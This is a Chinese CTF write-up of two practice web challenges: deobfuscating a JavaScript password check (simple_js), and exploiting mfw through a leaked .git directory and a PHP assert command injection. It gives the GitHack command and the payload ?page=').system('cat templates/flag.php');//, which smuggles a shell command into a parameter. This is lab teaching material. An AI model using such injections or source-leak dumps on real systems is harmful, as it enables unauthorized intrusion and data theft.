【攻防世界WEB】难度三星9分入门题(上):simple_js、mfw
目录
一、simple_js
解题方法:
过程:
二、mfw
解题方法:
过程:
一、simple_js
解题方法:
1、理解php代码
过程:
输入框中输入密码后
Ctrl+U查看源码
<html> <head><title>JS</title><script type="text/javascript">function dechiffre(pass_enc){var pass = "70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65";var tab = pass_enc.split(',');var tab2 = pass.split(',');var i,j,k,l=0,m,n,o,p = "";i = 0;j = tab.length;k = j + (l) + (n=0);n = tab2.length;for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];p += String.fromCharCode((o = tab2[i]));if(i == 5)break;}for(i = (o=0); i < (k = j = n); i++ ){o = tab[i-l];if(i > 5 && i < k-1)p += String.fromCharCode((o = tab2[i]));}p += String.fromCharCode(tab2[17]);pass = p;return pass;}String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));h = window.prompt('Enter password');alert( dechiffre(h) ); </script> </head> </html>
1、function定义了一个函数
2、被切为2部分
3、o=tab[i-1]无效,会被后面o=tab2[i]的值覆盖
4、tab数组、输入参数都没有用到5、tab2数组的值覆盖了tab的值,输入什么密码都没用
获取信息:
dechiffre():将 Unicode 编码转为一个字符
fromCharCode(): 可接受一个指定的 Unicode 值,然后返回一个字符串
10进制的字符:
70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65
16进制的字符:
\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30
var n=String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50);document.write(n);var m=String.fromCharCode(70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65);document.write(m);
786OsErtk12
FAUX PASSWORD HAHA
或者:
php运行
<?php $a='\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30'; $b=str_replace('\x','',$a); echo hex2bin($b); ?>
55,56,54,79,115,69,114,116,107,49,50
python运行a=[55,56,54,79,115,69,114,116,107,49,50] b="" for i in a:c=chr(i)b=b+c print(b)
786OsErtk12
FAUX PASSWORD HAHA
(人造密码哈哈)
题目提示(Flag格式为 Cyberpeace{xxxxxxxxx} )
所以flag为
Cyberpeace{786OsErtk12}
二、mfw
解题方法:
1、.git源码泄露
过程:
点进去发现只有这一个
尝试是否存在git泄露
存在git泄露
使用python2.7(我不想全局环境换来换去,直接在python2.7文件夹运行)
GitHack:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit
https://github.com/lijiejie/GitHack
语法:python GitHack.py http://www.openssl.org/.git/
我写的是GitHack.py的绝对路径
PS C:\Python27> python D:\BaiduNetdiskDownload\shenji\GitHack-master\GitHack.py http://61.147.171.105:62321/.git/
打开flag.php
也没发现flag
源码审计一波
自己看发现没有做任何的过滤,考虑试一试注入
payload:
?page=').system('cat templates/flag.php');//
')闭合前面的strpos函数,//注释掉后面的
注入进去以后就是
assert("strpos('templates/').system('cat templates/flag.php');//.php', '..') === false") or die("Detected hacking attempt!");
想到了flag.php
会不会是在代码里
Ctrl+U查看源码,或者使用bp抓包,不会错过许多细节
【攻防世界WEB】难度三星9分入门题(上):simple_js、mfw相关推荐
- 【攻防世界WEB】难度三星9分入门题(中):ics-05、easytornado
目录 三.ics-05 解题方法: 过程: 四.easytornado 解题方法: 过程: 三.ics-05 解题方法: 1.php代码理解.php伪协议 过程: 进去先扫了一遍 index.html ...
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界 web高手进阶区 9分题 bilibili
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...
- 攻防世界 web高手进阶区 7分题Confusion1
前言 继续ctf的旅程 开始攻防世界web高手进阶区的7分题 本文是Confusion1的writeup 解题过程 进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...
- XCTF攻防世界Web新手入门题大全
XCTF攻防世界Web之WriteUp无图版 (Tips:有图版本,请移步我的资源,自行下载doc文档) 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 vie ...
- 攻防世界web进阶区Web_python_block_chain详解
攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...
- 攻防世界WEB进阶之ics-05
攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...
- 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...
最新文章
- 常用 CSS 选择器
- .NET应用架构设计—面向查询服务的参数化查询设计(分解业务点,单独配置各自的数据查询契约)...
- SPOJ 130 - Rent your airplane and make money(dp+优化)
- 自然语言处理一大步,应用Word2Vec模型学习单词向量表征
- 主线程 唤醒_python线程之九:生产者消费者3种方式,2个线程1个协程
- 2017双11技术揭秘—阿里数据库计算存储分离与离在线混布
- maccmsv10 苹果cms10 站群扩展 自用版
- mysql二分法查找亿行_算法——二分法查找(binarySearch)
- 火车进出栈问题(高精度+压位+质因数分解消除除法)
- 酒店客房管理系统任务汇报1
- 项目管理工具maven
- 腾讯同事要跳槽,问我背包问题具体咋回事,我直接甩给他这篇!
- 幼儿抽象逻辑思维举例_四个锻炼幼儿推理能力的小游戏,让孩子的逻辑思维更上一层楼...
- SWEBOK软件工程知识体系 - 7.软件工程管理
- 288芯光缆交接箱光交箱图文详解
- 2013.11.18周例会小结
- 淘宝商品上传API接口
- 360极速浏览器调用selenium
- 软件开发模型之迭代模型
- ElasticSearch整合SpringBoot的API操作